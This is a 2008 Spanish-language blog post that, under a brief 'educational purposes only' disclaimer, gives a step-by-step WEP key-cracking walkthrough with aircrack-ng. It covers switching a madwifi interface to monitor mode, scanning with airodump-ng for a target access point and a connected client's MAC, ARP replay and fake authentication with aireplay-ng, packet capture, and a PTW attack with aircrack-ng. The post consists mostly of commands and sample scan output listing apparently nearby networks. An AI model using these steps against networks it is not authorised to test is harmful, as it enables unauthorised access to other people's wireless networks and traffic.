martes, 14 de octubre de 2008

Seguridad en wifi

ESTO SOLO CON PROPOSITOS EDUCACIONALES:

solo abarca el obtener contraseñas tipo wep, breve explicacion, la contraseña puede estar en hexa y en ascii, elementos para trabajar:

1.- tarjeta wireless en modo monitor, aircrack-ng, airoplay-ng, airodump-ng,

todo esto instalable

sudo apt-get install xxxxxxx

ahora lo otro

como es mi pc explico esta con los drivers mad wifi y funcionan de la con los siguiente comandos:

primero hay que eliminar la interfaz en modo managed:

wlanconfig ath0 destroy

con eso cayo el internet, ahora crearla con modo monitor.

wlanconfig ath0 create wlandev wifi0 wlanmode monitor

para volver a crear en modo monitor reemplazar "monitor" por "managed"

listo.

hecho eso los programas que instados se usan a

Primero:


airodump-ng -c 6 ath0


el “-c” es channel “6” es el canal y ath0 es el dispositivo wireless


de la info que te arroja es pantalla son dos los datos importantes que seran reutilizados mas adelantes,


CH 6 ][ Elapsed: 20 s ][ 2008-10-08 14:58


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


00:02:CF:95:55:DC 28 100 223 4964 222 6 54. WEP WEP DELUX

00:1B:11:A6:41:22 20 80 202 0 0 6 54. WEP WEP D33

00:0F:66:9E:82:70 1 0 2 0 0 6 48 OPN linksys

00:1C:DF:15:3C:6A 1 80 167 0 0 6 54 WPA TKIP PSK Cerdo Ara�a

00:14:D1:3E:B4:4A 0 0 36 1 0 6 54. WEP WEP Cristobal M


BSSID STATION PWR Rate Lost Packets Probes


00:02:CF:95:55:DC 00:1F:E1:36:4B:A0 67 54-48 24 8838 DELUX

00:02:CF:95:55:DC 00:14:78:8F:BF:F6 44 0-54 0 2



atencion a las negritas,


el BSSID es la mac del punto de acceso/router y STATION es la mac de un cliente conectado al punto de acceso. Estos datos loa guardamos en archivo de txt.


Ahora viene dos pasos que se ejecutan de manera simultanea, se abre una nueva terminal y la primera donde estabamos trabajando le damos clear y ponemos:


aireplay-ng --arpreplay -b [BSSID of the network] -h [Connected clients MAC address] [Interface]


rellenamos con los datos que guardamos, luego en la segunda terminal colocamos



aireplay-ng -1 0 -a [BSSID of the network] -h [Connected clients MAC address] -e [ESSID or Network Name] [Interface]


rellenamos nuevamente los campos con los datos que ya teniamos. Y hechamos a andar ambos a la vez

insistimos ejecutando varias veces el segundo.

Ya hecho esto hechamos a andar el airdump con:


airodump-ng -c [Channel] --bssid [BSSID of the network] -w [Capture file name] [interface]


reemplazando datos donde correspoponde esperar que se capturen 10.000 paketes.


Y para la guinda de la torta aircrack:


aircrack-ng -z {This starts the PTW attack which is much faster} [Capture file name]


esperas y tienes la clave.


No hay comentarios: